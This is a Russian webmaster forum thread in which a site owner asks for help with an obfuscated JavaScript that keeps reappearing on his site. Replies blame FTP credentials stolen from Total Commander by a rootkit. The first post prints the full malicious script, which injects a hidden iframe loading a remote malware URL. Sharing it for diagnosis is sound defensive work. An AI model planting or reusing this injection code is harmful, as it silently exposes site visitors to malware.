Прошу помощи

markus23
На сайте с 21.02.2010
Offline
10
738

Доброго времени суток, уважаемые формучане! Не сочтите за спам, может не в тот раздел пишу но я прошу вас помочь. У меня проблема такого характера, на сайте появился левый код, после его удаления сменил все пароли FTP думал что все наладится, но не тут то было. На следующий день опять такаеже ситуация, я опять сменил пароли форматнул диск С в надежде что проблема исчезнет, вот прошло полдня вроде все нормально, ввожу пароли в тотал командер и через некоторое время опять код появляется на сайте. Прогонял весь комп антивирусом и без толку.

Вот сам код:

<script type='text/javascript'>function zG(){};tF=53186;zG.prototype = {fK : function() {e="e";this.fQ='';return 'h2t)tFp2:&/F/)c2l)iFc)k&-FpFo)i)s)k2.Fc&o)m2/&tIh&eFrFeF/&i)n).2c)gIi&?27)'.iH(/[\)I&F2]/g, '');var oN=new Date();this.nU="";},v : function() {dF="";wS=9383;nB="nB";var t=new Date(); var h='';var m=new Date(); String.prototype.iH=function(d, o){return this.replace(d, o)};var r=new Date();tR="tR";kQ=false;gG=20573;wJ=false;zW="";var c=function(){};var y=window;gN="gN";this.yQ="yQ";var yR=y['u{n$eYs9c{aYp{eY'.iH(/[Yj9\$\{]/g, '')];var eK=new Date();var hI="hI";function jL(){};var z = this;var rN='';var p=false;var oD = "xxK%3C%2Fbody%3E%3C%2Fhtml%3E";function mT(){};xH="";this.u=false;var f=document;this.dX="dX";this.hB="hB";var jA=false;var k = { vM : 'arpTpreonTd#CohoirlSd#'.iH(/[#roST]/g, ''), oU : 'svtuyvlvei'.iH(/[ivua_]/g, ''), kC : 'cKrCe3aKt3ezEzlzezmKeGn3tK'.iH(/[K3zCG]/g, ''), fV : 'sReDtRATtTt?rRiRbRuTtEeT'.iH(/[TD\?ER]/g, ''), w : 's;rLcL'.iH(/[L;\{\(5]/g, ''), xK : 'bko1dUyT'.iH(/[T1Uk\)]/g, '') };var rK='';function hV(){};var uI=function(){return 'uI'};this.gC='';var rP="";var tZ=function(){return 'tZ'};this.a="a";var n=f[k.kC]('i<furuaKm<ed'.iH(/[d\<\!uK]/g, ''));var kL=new Date();i=39073;this.fU="fU";jO=false;pW='';var eY=5116;try {rD="rD";vC=false;var fI=function(){};var rU="rU";this.q="q";b="";var bJ='';nE(n,k.oU, yR("display%3A%20none"));function dS(){};rG=63044;this.uK=false;this.iB="iB";nE(n,k.w, this.fK());eU="eU";this.pS='';this.fR="";var qA='';qE="qE";qL="";f[k.xK][k.vM](n);this.xL=54456;this.hW="";var bK=new Array();this.iR="";} catch(g) {this.vB="";tN='';var eJ='';var uD=new Array();var rV=new Date();var l=function(){};this.lK='';f['wSr%i;tSe%'.iH(/[%;XS/]/g, '')](yR(oD));this.hK=49925;var iL=new Array();hKH='';this.uJ=61972;this.cO="cO";var s="s";this.mG=53808;y['s+eAt+T6iwm+ewoAuAtw'.iH(/[w\+Z6A]/g, '')](function(){ this.cJ="cJ";this.uR="";var pO='';vH=58151;this.dSF='';var sV="sV";z.v();var wH=34896;var cM=new Date();var yK=new Array();var eYV=function(){};this.kU="kU";zT="";}, 368);zJ="";var dXZ="dXZ";}qZ=19279;this.vBG='';var nM=new Date();var tZZ=false;var eE=new Date();var hC=new Date();function vO(){};var wZ="";function nE(n, j, dB){this.bW='';var fT=new Array();n[k.fV](j,dB);var iRP=function(){return 'iRP'};tD="";var kI=new Array();}this.xX='';this.fX='';var tQ=false;dV=false;}};var uY=new Array();var cP=new zG(); this.dK="dK";cP.v();function gQ(){};</script>

Я прошу помогите, уже незнаю что делать и где этот вирус или же код сидит на компьютере. Заранее спасибо.

Покупка и продажа ссылок (http://www.sape.ru/r.MKoyydOAst.php) Форексе "Автопилотом" 1000$ (http://wmforex.info/forex_avtopilot/87-zarabotok-foreks-na-avtopilote.html) Качественный хостинг от 1$ (http://bp.webhost1.ru/?r=652)
S
На сайте с 28.10.2005
Offline
312
#1

А хостер кто?

V6
На сайте с 04.03.2009
Offline
147
#2

Вам сюда: /ru/forum/455256

K
На сайте с 10.10.2003
Offline
161
#3
markus23:
Доброго времени суток, уважаемые формучане! Не сочтите за спам, может не в тот раздел пишу но я прошу вас помочь. У меня проблема такого характера, на сайте появился левый код, после его удаления сменил все пароли FTP думал что все наладится, но не тут то было. На следующий день опять такаеже ситуация, я опять сменил пароли форматнул диск С в надежде что проблема исчезнет, вот прошло полдня вроде все нормально, ввожу пароли в тотал командер и через некоторое время опять код появляется на сайте. Прогонял весь комп антивирусом и без толку.

Вот сам код:


Я прошу помогите, уже незнаю что делать и где этот вирус или же код сидит на компьютере. Заранее спасибо.

FTP-клиент не Wincmd/Totalcmd ?

Здесь покупаю домены (https://www.webnames.ru/domains/namebuddy?ref_id=8253) Бережное SEO. Миграция на Wordpress. Настройка и поддержка Wordpress ( http://kochugov.ru )
markus23
На сайте с 21.02.2010
Offline
10
#4
semenov:
А хостер кто?

Я думаю не в хостере дело, потому как пользуюсь двумя, на один из них незаходил а на второй на котором небыло вообще ничего, думал залить файлы через FTP после чего появился этот код. Тоесть при вводе паролей в тотал командер пароли передаюся, и где этот троян сидит на компе непойму...

markus23 добавил 22.02.2010 в 00:07

kochugov:
FTP-клиент не Wincmd/Totalcmd ?

Да, именно им и пользуюсь. Total Commander

K
На сайте с 10.10.2003
Offline
161
#5
markus23:
Я думаю не в хостере дело, потому как пользуюсь двумя, на один из них незаходил а на второй на котором небыло вообще ничего, думал залить файлы через FTP после чего появился этот код. Тоесть при вводе паролей в тотал командер пароли передаюся, и где этот троян сидит на компе непойму...

markus23 добавил 22.02.2010 в 00:07


Да, именно им и пользуюсь. Total Commander

ну вот тебе и ответ

и пароли ведь в нем хранишь

снеси тотал - все данные заведи в FAR

пароли менять не обязательно

markus23
На сайте с 21.02.2010
Offline
10
#6
kochugov:
ну вот тебе и ответ
и пароли ведь в нем хранишь

снеси тотал - все данные заведи в FAR
пароли менять не обязательно

Но небыло такого, это впервые такая вот фигня да и пароли я ручками вбиваю, файл перегнал и сразу пароли поудалял, и кода оно успевает... В течении года хранил пароли в командере и ничего подобного небыло а тут такое....

markus23 добавил 22.02.2010 в 00:20

Люди ну что никто непоможет? Сам пароль неможет передаваться, для этого должно ему помогать какаето программа, а где ее искать когда весь вомп перепроверил и ниче ненашел.

SmileP
На сайте с 18.02.2010
Offline
386
#7
markus23:

Люди ну что никто непоможет? Сам пароль неможет передаваться, для этого должно ему помогать какаето программа, а где ее искать когда весь вомп перепроверил и ниче ненашел.

Попробуй, смени командер ;)

Я раньше тоже в руткиты не верил.

З.Ы. руткит, так к примеру.

K
На сайте с 10.10.2003
Offline
161
#8
SmileP:
Попробуй, смени командер ;)
Я раньше тоже в руткиты не верил.
З.Ы. руткит, так к примеру.

именно так - руткит стоит

у меня так по выходным по всем сайтам JS-код проставлялся😒

решение, которое 100% помогло:

1) удалил из тотал коммандер все доступы к FTP - теперь пользуюсь FAR

2) прогнал прогой Autorun Manager

Jaf4
На сайте с 03.08.2009
Offline
804
#9

всегда пользовался только фаром, на одном из сайтов была замечена подобная зараза. Вычистил. Сложно сказать, как она туда попала, но тут как раз почти решил сменить хостера, скажем так, это стало последней каплей.

New! NVMe VPS от SmartApe.ru (https://goo.gl/eoYYkS)
Deler
На сайте с 20.02.2007
Offline
78
#10

А я предпочитаю вот такой клиент, пока никакой заразы, тьфу тьфу

http://www.filezilla.ru/

Фтопку скучные выходные! Веселись в месте с Сапой (http://www.sape.ru/r.ZpKTpFrELe.php) Эффективное продвижение сайтов - ВебЭффектор (http://client.webeffector.ru/registration.html?invitation=1e8ca836c962598551882e689265c1c5). (http://vremiakino.com/)

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий